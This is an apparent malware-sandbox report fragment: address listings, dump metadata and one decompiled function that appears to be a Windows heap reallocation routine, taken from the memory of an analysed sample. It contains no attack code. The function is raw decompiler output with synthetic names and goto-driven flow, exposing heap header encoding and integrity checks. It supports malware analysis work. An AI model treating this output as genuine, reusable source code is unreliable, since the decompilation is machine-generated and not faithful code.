                                                                                                                                                                                  0x333a7381
                                                                                                                                                                                  0x333a7384
                                                                                                                                                                                  0x333a7395
                                                                                                                                                                                  0x333a7386
                                                                                                                                                                                  0x333a7386
                                                                                                                                                                                  0x333a7388
                                                                                                                                                                                  0x333a738b
                                                                                                                                                                                  0x333a738d
                                                                                                                                                                                  0x333a738d
                                                                                                                                                                                  0x333a738d
                                                                                                                                                                                  0x333a7390
                                                                                                                                                                                  0x333a7390
                                                                                                                                                                                  0x333a735a
                                                                                                                                                                                  0x333a7367
                                                                                                                                                                                  0x333a7369
                                                                                                                                                                                  0x333a736c
                                                                                                                                                                                  0x333a7377
                                                                                                                                                                                  0x333a7377
                                                                                                                                                                                  0x333a7379
                                                                                                                                                                                  0x333a736e
                                                                                                                                                                                  0x333a736e
                                                                                                                                                                                  0x333a736e
                                                                                                                                                                                  0x333a737b
                                                                                                                                                                                  0x333a737b
                                                                                                                                                                                  0x333a7398
                                                                                                                                                                                  0x333a739f
                                                                                                                                                                                  0x333a73a2
                                                                                                                                                                                  0x333a73c9
                                                                                                                                                                                  0x333a73c9
                                                                                                                                                                                  0x333a73a4
                                                                                                                                                                                  0x333a73a4
                                                                                                                                                                                  0x333a73a7
                                                                                                                                                                                  0x333a73b8
                                                                                                                                                                                  0x333a73a9
                                                                                                                                                                                  0x333a73a9
                                                                                                                                                                                  0x333a73ab
                                                                                                                                                                                  0x333a73ae
                                                                                                                                                                                  0x333a73b0
                                                                                                                                                                                  0x333a73b0
                                                                                                                                                                                  0x333a73b0
                                                                                                                                                                                  0x333a73b3
                                                                                                                                                                                  0x333a73b3
                                                                                                                                                                                  0x333a73c3
                                                                                                                                                                                  0x333a73c3
                                                                                                                                                                                  0x333a73cc
                                                                                                                                                                                  0x333a73cf
                                                                                                                                                                                  0x333a73d2
                                                                                                                                                                                  0x333a73d4
                                                                                                                                                                                  0x333a73d8
                                                                                                                                                                                  0x333a73d8
                                                                                                                                                                                  0x333a73db
                                                                                                                                                                                  0x333a73de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a73e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a73e4
                                                                                                                                                                                  0x333a73de
                                                                                                                                                                                  0x333a72d4
                                                                                                                                                                                  0x333a72d9
                                                                                                                                                                                  0x333a72db
                                                                                                                                                                                  0x333a72e0
                                                                                                                                                                                  0x333a72f2
                                                                                                                                                                                  0x333a72f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a72f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a72f6
                                                                                                                                                                                  0x333a72c8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a728a
                                                                                                                                                                                  0x333a728a
                                                                                                                                                                                  0x333a729d
                                                                                                                                                                                  0x333a72a8
                                                                                                                                                                                  0x333a72ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a72ab
                                                                                                                                                                                  0x333a71a0
                                                                                                                                                                                  0x333a71a7
                                                                                                                                                                                  0x333a71ad
                                                                                                                                                                                  0x333a71b2
                                                                                                                                                                                  0x333a71b2
                                                                                                                                                                                  0x333a71be
                                                                                                                                                                                  0x333a71c3
                                                                                                                                                                                  0x333a71d0
                                                                                                                                                                                  0x333a71d5
                                                                                                                                                                                  0x333a71da
                                                                                                                                                                                  0x333a720a
                                                                                                                                                                                  0x333a720d
                                                                                                                                                                                  0x333a720f
                                                                                                                                                                                  0x333a7211
                                                                                                                                                                                  0x333a7211
                                                                                                                                                                                  0x333a7211
                                                                                                                                                                                  0x333a7215
                                                                                                                                                                                  0x333a721a
                                                                                                                                                                                  0x333a721c
                                                                                                                                                                                  0x333a7222
                                                                                                                                                                                  0x333a7222
                                                                                                                                                                                  0x333a71dc
                                                                                                                                                                                  0x333a71f0
                                                                                                                                                                                  0x333a71fb
                                                                                                                                                                                  0x333a71fb
                                                                                                                                                                                  0x333a71fe
                                                                                                                                                                                  0x333a7201
                                                                                                                                                                                  0x333a7207
                                                                                                                                                                                  0x333a7207

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8932bc6e2cf647bc4c973c2adfc136c4ae092e1a96d8c14df9980c175a3f868c
                                                                                                                                                                                  • Instruction ID: 44f99782916257be05c526cc40896ee28a3d86424c6da013484ad989fbc4b3fc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8932bc6e2cf647bc4c973c2adfc136c4ae092e1a96d8c14df9980c175a3f868c
                                                                                                                                                                                  • Instruction Fuzzy Hash: AE427075A006168FDB08CF9DC8D06AEB7B6FF88354B18C56DE451AB790DB35E842CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33362760 Relevance: .6, Instructions: 605COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E33362760(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				signed char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed char _v100;
				signed char _v101;
				signed int _v108;
				signed char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v124;
				signed char _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				void* _t234;
				intOrPtr _t237;
				signed int _t242;
				signed int _t245;
				signed char _t246;
				intOrPtr _t250;
				signed short _t254;
				signed int _t256;
				signed char _t260;
				void* _t264;
				signed char _t266;
				intOrPtr* _t268;
				signed char _t271;
				signed int _t272;
				signed short _t275;
				signed short _t278;
				signed short _t279;
				signed int _t284;
				signed short _t285;
				signed int _t287;
				void* _t288;
				signed short _t289;
				signed int _t291;
				void* _t292;
				signed char _t297;
				signed short _t299;
				signed char _t301;
				signed short _t320;
				signed short _t322;
				signed short _t323;
				signed int _t325;
				void* _t326;
				signed char _t330;
				signed int _t334;
				signed int _t335;
				void* _t337;
				signed char _t343;
				signed int _t345;
				intOrPtr _t352;
				signed int _t361;
				signed char _t363;
				signed int _t364;
				signed char _t365;
				unsigned int _t370;
				signed int _t374;
				signed char _t378;
				void* _t385;
				signed int _t387;
				signed char _t388;
				signed int _t390;
				signed int _t391;
				signed short _t396;
				signed int _t398;
				signed char _t399;
				unsigned int _t407;
				unsigned int _t409;
				unsigned int _t411;
				unsigned int _t421;
				unsigned int _t424;
				void* _t429;
				signed char _t430;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				void* _t439;
				void* _t445;

				_t386 = __edx;
				_t337 = _t445;
				_v8 =  *((intOrPtr*)(_t337 + 4));
				_t443 = (_t445 - 0x00000008 & 0xfffffff8) + 4;
				_v16 =  *0x3344b370 ^ (_t445 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_t437 = __ecx;
				_v124 =  *(_t337 + 0xc);
				_t339 =  *(_t337 + 8);
				_t226 =  *(_t337 + 0x10);
				_v112 = _t339;
				_v132 = _t226;
				_v120 = 0;
				_v116 = 0;
				_t428 =  *(_t337 + 0x14);
				_v128 = _t428;
				if(_t339 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E3337ABA0(0);
					L150:
					_t229 = 0;
					L19:
					_pop(_t429);
					_pop(_t439);
					return E33394B50(_t229, _t337, _v16 ^ _t443, _t386, _t429, _t439);
				}
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t387 = E333FD8D2(__edx);
					_t232 =  *(__ecx + 0xb0);
					_v108 = _t387;
					__eflags = _t232;
					if(_t232 != 0) {
						_t352 =  *[fs:0x18];
						__eflags = _t232 -  *((intOrPtr*)(_t352 + 0x24));
						if(_t232 ==  *((intOrPtr*)(_t352 + 0x24))) {
							_t390 = _t387 | 0x00000001;
							__eflags = _t390;
							_v108 = _t390;
						}
					}
					__eflags =  *0x334438c0 & 0x00000002;
					_t430 = _v112;
					_t343 = _t430;
					if(( *0x334438c0 & 0x00000002) == 0) {
						_t233 = 0;
						__eflags = 0;
					} else {
						_t233 =  *((intOrPtr*)(_t430 - 8));
						_t343 = _t343 - _t233;
					}
					_t388 = _v108;
					_v120 = _t233;
					_t234 = _t233 + _v124;
					__eflags = _t234 - _v124;
					if(_t234 >= _v124) {
						_t345 = E3341970B(_t437, _t388, _t343, _t234, _v132, _v128);
						_v116 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							goto L33;
						}
						__eflags = _t345 - 0xffffffff;
						if(_t345 == 0xffffffff) {
							goto L33;
						} else {
							__eflags =  *0x334438c0 & 0x00000002;
							_t386 = _v120;
							if(( *0x334438c0 & 0x00000002) != 0) {
								 *(_t345 + _t386 - 8) = _t386;
								_t246 = _t345 + _t386;
								__eflags = _t386 - 8;
								if(_t386 > 8) {
									 *_t345 = _t386;
								}
								_v116 = _t246;
							}
							_t245 = _v132;
							__eflags = _t245;
							if(_t245 != 0) {
								 *_t245 =  *_t245 - _t386;
							}
							goto L37;
						}
					} else {
						_t345 = 0;
						__eflags = 0;
						L33:
						asm("sbb ecx, ecx");
						_t55 = ( ~_t345 & 0xffffffee) - 0x3fffffe9; // -1073741801
						_t386 = _t55;
						_v128 = _t386;
						_v116 = 0;
						 *( *[fs:0x18] + 0xbf4) = _t386;
						_t237 = E3337ABA0(_t386);
						__eflags = _v108;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t237;
						if(_v108 < 0) {
							L35:
							_v100 = _v128;
							_v80 = _v124;
							_push( &_v100);
							_v92 = 0;
							_v84 = 1;
							_v96 = 0;
							_v88 = E333A8A60;
							E333A8A60(0, _t386);
							L36:
							_t430 = _v112;
							L37:
							_t242 = L33363C20(_t437);
							__eflags = _t242;
							_t229 = _v116;
							if(_t242 != 0) {
								__eflags = _t229;
								if(_t229 != 0) {
									E3340E8B1(_t437, _t430);
									_t386 = _v116;
									E3340DF93(_t437, _v116);
									_t229 = _v116;
								}
							}
							goto L19;
						}
						__eflags =  *(_t437 + 0xc);
						if( *(_t437 + 0xc) >= 0) {
							goto L36;
						}
						goto L35;
					}
				}
				if(_t226 != 0) {
					 *_t226 = 0;
				}
				if(_t428 != 0) {
					 *_t428 = 0;
				}
				_v108 = _t386;
				if(( *(_t437 + 0x44) & 0x01000000) != 0) {
					_push(_v124);
					_push(_t339);
					_t229 = L333FFDF4(_t337, _t437, _t386, _t428, _t437, __eflags);
					goto L19;
				} else {
					if( *0x3344373c != 0) {
						L8:
						if(( *(_t437 + 0x48) & 0x00000001) != 0) {
							_t386 = _t339;
							_t432 = E3334A4D2(_t337, _t437, _t339, _t428, _t437, __eflags);
							L12:
							_t339 = _v112;
							L13:
							if(_t432 == 0) {
								_t433 = 0xc0000005;
								L148:
								 *( *[fs:0x18] + 0xbf4) = _t433;
								_t250 = E3337ABA0(_t433);
								__eflags = _v108 & 0x00000004;
								 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t250;
								if((_v108 & 0x00000004) != 0) {
									_v80 = _v124;
									_push( &_v100);
									_v100 = _t433;
									_v92 = 0;
									_v84 = 1;
									_v96 = 0;
									_v88 = E333A8A60;
									E333A8A60(_t339, _t386);
								}
								goto L150;
							}
							if( *((char*)(_t339 - 1)) == 5) {
								__eflags =  *(_t432 + 7);
								if(__eflags >= 0) {
									__eflags =  *(_t437 + 0x4c);
									if( *(_t437 + 0x4c) == 0) {
										L61:
										__eflags =  *(_t432 + 7);
										if( *(_t432 + 7) >= 0) {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t254 =  *_t432 & 0x0000ffff;
											} else {
												_t323 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t323;
												if(( *(_t437 + 0x4c) & _t323) != 0) {
													_t323 = _t323 ^  *(_t437 + 0x50);
													__eflags = _t323;
												}
												_t254 = _t323 & 0x0000ffff;
											}
										} else {
											_t421 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x33446964;
											__eflags = _t421;
											if(_t421 == 0) {
												_t325 = _t432 - (_t421 >> 0xd);
												__eflags = _t325;
												_t326 =  *_t325;
											} else {
												_t326 = 0;
											}
											_t254 =  *((intOrPtr*)(_t326 + 0x14));
										}
										__eflags =  *(_t432 + 7) - 4;
										_t256 = _t254 & 0xffff;
										_v128 = _t256;
										if( *(_t432 + 7) != 4) {
											_t391 = _t256 * 8;
										} else {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t320 =  *_t432 & 0x0000ffff;
											} else {
												_t322 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t322;
												if(( *(_t437 + 0x4c) & _t322) != 0) {
													_t322 = _t322 ^  *(_t437 + 0x50);
													__eflags = _t322;
												}
												_t320 = _t322 & 0x0000ffff;
											}
											_t391 =  *((intOrPtr*)(_t432 - 8)) - (_t320 & 0x0000ffff) + _v128;
										}
										__eflags = _t391 + _t432 - _t339;
										if(_t391 + _t432 >= _t339) {
											L84:
											__eflags = _v108 & 0x3c000102;
											_v116 =  *(_t339 - 8);
											if((_v108 & 0x3c000102) != 0) {
												goto L15;
											}
											_t271 =  *((intOrPtr*)(_t339 - 1));
											__eflags = _t271 - 5;
											if(_t271 != 5) {
												__eflags = _t271 & 0x00000040;
												if((_t271 & 0x00000040) == 0) {
													_t396 = 0;
													__eflags = 0;
												} else {
													_t396 = (_t271 & 0x3f) << 0x00000003 & 0x0000ffff;
													_t271 =  *((intOrPtr*)(_t339 - 1));
												}
											} else {
												_t396 = ( *(_t339 - 2) & 0x000000ff) << 0x00000003 & 0x0000ffff;
												_t271 =  *((intOrPtr*)(_t339 - 1));
											}
											_t361 = _t396 & 0x0000ffff;
											_v120 = _t396;
											_v132 = _t361;
											_t339 = _t361 + _v124;
											_v128 = _t339;
											_t386 = _v112 - 8;
											__eflags = _t339 - _v124;
											if(_t339 < _v124) {
												L147:
												_t433 = 0xc0000017;
												goto L148;
											} else {
												_v124 = _t339;
												__eflags = _t271 - 5;
												if(_t271 != 5) {
													_t398 = 0;
													__eflags = 0;
												} else {
													_t398 = _t386 - (( *(_t386 + 6) & 0x000000ff) << 3) + 8;
												}
												_t339 = _v116;
												_t386 = _t437;
												_t272 = E333F78DE(_v116, _t437, _v112, 5, _t398);
												__eflags = _t272;
												if(_t272 >= 0) {
													_t363 =  *(_t432 + 7);
													__eflags = _t363 - 4;
													if(_t363 != 4) {
														__eflags = _t363 - 5;
														if(_t363 != 5) {
															__eflags = _t363 & 0x00000040;
															if((_t363 & 0x00000040) == 0) {
																__eflags = (_t363 & 0x0000003f) - 0x3f;
																if((_t363 & 0x0000003f) == 0x3f) {
																	__eflags = _t363;
																	if(_t363 >= 0) {
																		__eflags =  *(_t437 + 0x4c);
																		if( *(_t437 + 0x4c) == 0) {
																			_t275 =  *_t432 & 0x0000ffff;
																		} else {
																			_t289 =  *_t432;
																			__eflags =  *(_t437 + 0x4c) & _t289;
																			if(( *(_t437 + 0x4c) & _t289) != 0) {
																				_t289 = _t289 ^  *(_t437 + 0x50);
																				__eflags = _t289;
																			}
																			_t275 = _t289 & 0x0000ffff;
																		}
																	} else {
																		_t370 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x33446964;
																		__eflags = _t370;
																		if(_t370 == 0) {
																			_t291 = _t432 - (_t370 >> 0xd);
																			__eflags = _t291;
																			_t292 =  *_t291;
																		} else {
																			_t292 = 0;
																		}
																		_t275 =  *((intOrPtr*)(_t292 + 0x14));
																	}
																	_t364 =  *(_t432 + (_t275 & 0xffff) * 8 - 4);
																} else {
																	_t364 = _t363 & 0x3f;
																}
															} else {
																_t364 =  *(_t432 + 4 + (_t363 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t364 =  *(_t437 + 0x54) & 0x0000ffff ^  *(_t432 + 4) & 0x0000ffff;
														}
														_t399 =  *(_t432 + 7);
														_v101 = _t399;
														__eflags = _t399;
														if(_t399 >= 0) {
															__eflags =  *(_t437 + 0x4c);
															if( *(_t437 + 0x4c) == 0) {
																_t278 =  *_t432 & 0x0000ffff;
															} else {
																_t285 =  *_t432;
																__eflags =  *(_t437 + 0x4c) & _t285;
																if(( *(_t437 + 0x4c) & _t285) != 0) {
																	_t285 = _t285 ^  *(_t437 + 0x50);
																	__eflags = _t285;
																}
																_t278 = _t285 & 0x0000ffff;
															}
														} else {
															_t407 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x33446964;
															__eflags = _t407;
															if(_t407 == 0) {
																_t287 = _t432 - (_t407 >> 0xd);
																__eflags = _t287;
																_t288 =  *_t287;
															} else {
																_t288 = 0;
															}
															_t278 =  *((intOrPtr*)(_t288 + 0x14));
															_t399 = _v101;
														}
														_t365 = _t364 - _v132;
														_t279 = _t278 & 0x0000ffff;
														__eflags = _t365 - 0x3f;
														if(_t365 >= 0x3f) {
															 *(_t432 + (_t279 & 0x0000ffff) * 8 - 4) = _t365;
															_t284 = (_t399 >> 0x0000001f & 0x00000080) + 0x3f;
															__eflags = _t284;
															 *(_t432 + 7) = _t284;
														} else {
															 *(_t432 + 7) = _t399 >> 0x00000007 & 0x00000080 | _t365;
														}
													} else {
														_t374 = _v108;
														_t297 =  *(_t437 + 0x44) | _t374;
														__eflags = _t297 & 0x00000001;
														if((_t297 & 0x00000001) == 0) {
															E3335FED0( *((intOrPtr*)(_t437 + 0xc8)));
															_t374 = _v108;
														}
														__eflags =  *(_t437 + 0x4c);
														if( *(_t437 + 0x4c) != 0) {
															_t411 =  *(_t437 + 0x50) ^  *_t432;
															 *_t432 = _t411;
															_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
															__eflags = _t411 >> 0x18 - _t378;
															if(__eflags != 0) {
																_push(_t378);
																E3340D646(_t337, _t437, _t432, _t432, _t437, __eflags);
															}
															_t374 = _v108;
														}
														_t299 =  *_t432 - _v120;
														 *_t432 = _t299;
														__eflags =  *(_t437 + 0x4c);
														_t409 = _t299 & 0x0000ffff;
														if( *(_t437 + 0x4c) != 0) {
															 *(_t432 + 3) = _t409 >> 0x00000008 ^  *(_t432 + 2) ^ _t409;
															 *_t432 =  *_t432 ^  *(_t437 + 0x50);
															__eflags =  *_t432;
														}
														_t301 =  *(_t437 + 0x44) | _t374;
														__eflags = _t301 & 0x00000001;
														if((_t301 & 0x00000001) == 0) {
															_push( *((intOrPtr*)(_t437 + 0xc8)));
															E3335E740(_t374);
														}
													}
													_t188 = _t432 + 8; // 0xddeeddf6
													_t339 = _t188;
													_v112 = _t188;
													goto L15;
												} else {
													_t433 = 0xc0000005;
													goto L148;
												}
											}
										} else {
											L80:
											_v101 = 0;
											L81:
											_t386 = _t437;
											_t339 = 3;
											E33415FED(3, _t437, _t432, 3, 0, 0);
											__eflags = _v101;
											if(_v101 != 0) {
												_t339 = _v112;
												goto L84;
											}
											_t433 = 0xc000000d;
											goto L148;
										}
									}
									_t424 =  *(_t437 + 0x50) ^  *_t432;
									__eflags = _t424 >> 0x18 - (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424);
									_t339 = _v112;
									if(_t424 >> 0x18 != (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424)) {
										goto L80;
									}
									goto L61;
								}
								_t330 = E33411F59(_t337, _t437, _t432, _t432, _t437, __eflags);
								_t339 = _v112;
								_v101 = _t330;
								__eflags = _t330;
								if(_t330 != 0) {
									goto L61;
								}
								goto L81;
							}
							L15:
							_t386 = _v108 | 0x00000002;
							_t434 = E333628C0(_t437, _v108 | 0x00000002, _t339, _v124);
							_t260 =  *0x33446834; // 0x0
							if((_t260 & 0x00000001) != 0) {
								__eflags = _t260 & 0x00000002;
								if((_t260 & 0x00000002) == 0) {
									goto L16;
								}
								_t339 =  *[fs:0x30];
								__eflags =  *(_t339 + 0x18);
								if( *(_t339 + 0x18) == 0) {
									goto L16;
								}
								_push( *0x3344446c);
								_t268 = E33419682( *0x33444468);
								__eflags = _t437 -  *_t268;
								if(_t437 ==  *_t268) {
									goto L16;
								}
								__eflags = _t434;
								if(_t434 == 0) {
									L145:
									_v124 = _v124 - (_v120 & 0x0000ffff);
									__eflags = _v116;
									if(_v116 != 0) {
										_t435 = _v112;
										E3337B870(_t339, _t437, 0, _v112);
										_t264 = E333FD130(_t437, _v108, _v112, _t339, _v120, _v116);
										_t339 = _v116;
										_t386 = _t437;
										E333F78DE(_v116, _t437, _t264, 6, _t435);
									}
									goto L147;
								}
								_t339 = _v108;
								__eflags = _t339 & 0x10000000;
								if((_t339 & 0x10000000) != 0) {
									L17:
									if(_t434 == 0) {
										goto L145;
									} else {
										_t386 = _v116;
										_t229 = _t434;
										if(_v116 != 0) {
											_t266 = E333FD130(_t437, _t339, _t434, _t339, _v120, _t386);
											_t386 = _t437;
											_v128 = _t266;
											E333F78DE(_v116, _t437, _t266, 6, _t434);
											_t229 = _v128;
										}
										goto L19;
									}
								}
								E3340E8B1(_t437, _v112);
								_t386 = _t434;
								E3340DF93(_t437, _t434);
							}
							L16:
							_t339 = _v108;
							goto L17;
						}
						if((_t339 & 0x00000007) == 0) {
							__eflags =  *((char*)(_t339 - 1)) - 5;
							_t432 = _t339 - 8;
							if( *((char*)(_t339 - 1)) == 5) {
								_t432 = _t432 - (( *(_t432 + 6) & 0x000000ff) << 3);
								__eflags = _t432;
							}
							__eflags =  *(_t432 + 7) & 0x0000003f;
							if(( *(_t432 + 7) & 0x0000003f) != 0) {
								goto L13;
							} else {
								_push(0);
								_push(0);
								_push(0);
								_push(_t432);
								_t385 = 8;
								goto L11;
							}
						} else {
							_push(0);
							_push(0);
							_push(0);
							_push(_t339);
							_t385 = 9;
							L11:
							_t386 = _t437;
							E33415FED(_t385, _t437);
							_t432 = 0;
							goto L12;
						}
					}
					_t386 =  *(_t437 + 0xdc);
					_t334 =  *(_t437 + 0xdc);
					if(_t334 != 0) {
						L51:
						_t428 = _v124;
						__eflags = _v124 - _t334;
						if(__eflags <= 0) {
							goto L8;
						}
						_t335 =  *(_t437 + 0xe0);
						__eflags = _t335;
						if(_t335 != 0) {
							_t386 = _t437;
							_t339 = 0x14;
							E33415FED(0x14, _t437, 0, _t335, _t428, _t437);
						}
						goto L147;
					}
					_t334 =  *0x33444334; // 0x0
					if(_t334 != 0) {
						goto L51;
					}
					goto L8;
				}
			}






























































































                                                                                                                                                                                  0x33362760
                                                                                                                                                                                  0x33362763
                                                                                                                                                                                  0x33362772
                                                                                                                                                                                  0x33362776
                                                                                                                                                                                  0x33362782
                                                                                                                                                                                  0x33362789
                                                                                                                                                                                  0x3336278b
                                                                                                                                                                                  0x3336278e
                                                                                                                                                                                  0x33362791
                                                                                                                                                                                  0x33362794
                                                                                                                                                                                  0x33362797
                                                                                                                                                                                  0x3336279a
                                                                                                                                                                                  0x333627a1
                                                                                                                                                                                  0x333627a9
                                                                                                                                                                                  0x333627ac
                                                                                                                                                                                  0x333627b1
                                                                                                                                                                                  0x333b61eb
                                                                                                                                                                                  0x333b61fa
                                                                                                                                                                                  0x333b67f4
                                                                                                                                                                                  0x333b67f4
                                                                                                                                                                                  0x3336287e
                                                                                                                                                                                  0x33362881
                                                                                                                                                                                  0x33362884
                                                                                                                                                                                  0x33362890
                                                                                                                                                                                  0x33362890
                                                                                                                                                                                  0x333627be
                                                                                                                                                                                  0x333b6209
                                                                                                                                                                                  0x333b620b
                                                                                                                                                                                  0x333b6211
                                                                                                                                                                                  0x333b6214
                                                                                                                                                                                  0x333b6216
                                                                                                                                                                                  0x333b6218
                                                                                                                                                                                  0x333b621f
                                                                                                                                                                                  0x333b6222
                                                                                                                                                                                  0x333b6224
                                                                                                                                                                                  0x333b6224
                                                                                                                                                                                  0x333b6227
                                                                                                                                                                                  0x333b6227
                                                                                                                                                                                  0x333b6222
                                                                                                                                                                                  0x333b622a
                                                                                                                                                                                  0x333b6231
                                                                                                                                                                                  0x333b6234
                                                                                                                                                                                  0x333b6236
                                                                                                                                                                                  0x333b623f
                                                                                                                                                                                  0x333b623f
                                                                                                                                                                                  0x333b6238
                                                                                                                                                                                  0x333b6238
                                                                                                                                                                                  0x333b623b
                                                                                                                                                                                  0x333b623b
                                                                                                                                                                                  0x333b6241
                                                                                                                                                                                  0x333b6244
                                                                                                                                                                                  0x333b6247
                                                                                                                                                                                  0x333b624a
                                                                                                                                                                                  0x333b624d
                                                                                                                                                                                  0x333b630a
                                                                                                                                                                                  0x333b630c
                                                                                                                                                                                  0x333b630f
                                                                                                                                                                                  0x333b6311
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6317
                                                                                                                                                                                  0x333b631a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6320
                                                                                                                                                                                  0x333b6320
                                                                                                                                                                                  0x333b6327
                                                                                                                                                                                  0x333b632a
                                                                                                                                                                                  0x333b632c
                                                                                                                                                                                  0x333b6330
                                                                                                                                                                                  0x333b6333
                                                                                                                                                                                  0x333b6336
                                                                                                                                                                                  0x333b6338
                                                                                                                                                                                  0x333b6338
                                                                                                                                                                                  0x333b633a
                                                                                                                                                                                  0x333b633a
                                                                                                                                                                                  0x333b633d
                                                                                                                                                                                  0x333b6340
                                                                                                                                                                                  0x333b6342
                                                                                                                                                                                  0x333b6344
                                                                                                                                                                                  0x333b6344
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6342
                                                                                                                                                                                  0x333b6253
                                                                                                                                                                                  0x333b6253
                                                                                                                                                                                  0x333b6253
                                                                                                                                                                                  0x333b6255
                                                                                                                                                                                  0x333b6264
                                                                                                                                                                                  0x333b6269
                                                                                                                                                                                  0x333b6269
                                                                                                                                                                                  0x333b6272
                                                                                                                                                                                  0x333b6275
                                                                                                                                                                                  0x333b6278
                                                                                                                                                                                  0x333b627e
                                                                                                                                                                                  0x333b6283
                                                                                                                                                                                  0x333b6287
                                                                                                                                                                                  0x333b628a
                                                                                                                                                                                  0x333b6292
                                                                                                                                                                                  0x333b6295
                                                                                                                                                                                  0x333b629b
                                                                                                                                                                                  0x333b62a1
                                                                                                                                                                                  0x333b62a2
                                                                                                                                                                                  0x333b62a9
                                                                                                                                                                                  0x333b62b0
                                                                                                                                                                                  0x333b62b7
                                                                                                                                                                                  0x333b62be
                                                                                                                                                                                  0x333b62c3
                                                                                                                                                                                  0x333b62c3
                                                                                                                                                                                  0x333b62c6
                                                                                                                                                                                  0x333b62c8
                                                                                                                                                                                  0x333b62cd
                                                                                                                                                                                  0x333b62cf
                                                                                                                                                                                  0x333b62d2
                                                                                                                                                                                  0x333b62d8
                                                                                                                                                                                  0x333b62da
                                                                                                                                                                                  0x333b62e4
                                                                                                                                                                                  0x333b62e9
                                                                                                                                                                                  0x333b62ee
                                                                                                                                                                                  0x333b62f3
                                                                                                                                                                                  0x333b62f3
                                                                                                                                                                                  0x333b62da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b62d2
                                                                                                                                                                                  0x333b628c
                                                                                                                                                                                  0x333b6290
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6290
                                                                                                                                                                                  0x333b624d
                                                                                                                                                                                  0x333627c6
                                                                                                                                                                                  0x333b634b
                                                                                                                                                                                  0x333b634b
                                                                                                                                                                                  0x333627ce
                                                                                                                                                                                  0x333b6358
                                                                                                                                                                                  0x333b6358
                                                                                                                                                                                  0x333627de
                                                                                                                                                                                  0x333627e1
                                                                                                                                                                                  0x333b6360
                                                                                                                                                                                  0x333b6363
                                                                                                                                                                                  0x333b6366
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333627e7
                                                                                                                                                                                  0x333627ee
                                                                                                                                                                                  0x3336280d
                                                                                                                                                                                  0x33362811
                                                                                                                                                                                  0x333b639f
                                                                                                                                                                                  0x333b63a8
                                                                                                                                                                                  0x33362831
                                                                                                                                                                                  0x33362831
                                                                                                                                                                                  0x33362834
                                                                                                                                                                                  0x33362836
                                                                                                                                                                                  0x333b63af
                                                                                                                                                                                  0x333b67a4
                                                                                                                                                                                  0x333b67b2
                                                                                                                                                                                  0x333b67b8
                                                                                                                                                                                  0x333b67bd
                                                                                                                                                                                  0x333b67c1
                                                                                                                                                                                  0x333b67c4
                                                                                                                                                                                  0x333b67c9
                                                                                                                                                                                  0x333b67cf
                                                                                                                                                                                  0x333b67d0
                                                                                                                                                                                  0x333b67d3
                                                                                                                                                                                  0x333b67da
                                                                                                                                                                                  0x333b67e1
                                                                                                                                                                                  0x333b67e8
                                                                                                                                                                                  0x333b67ef
                                                                                                                                                                                  0x333b67ef
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b67c4
                                                                                                                                                                                  0x33362840
                                                                                                                                                                                  0x333b63b9
                                                                                                                                                                                  0x333b63bd
                                                                                                                                                                                  0x333b63d7
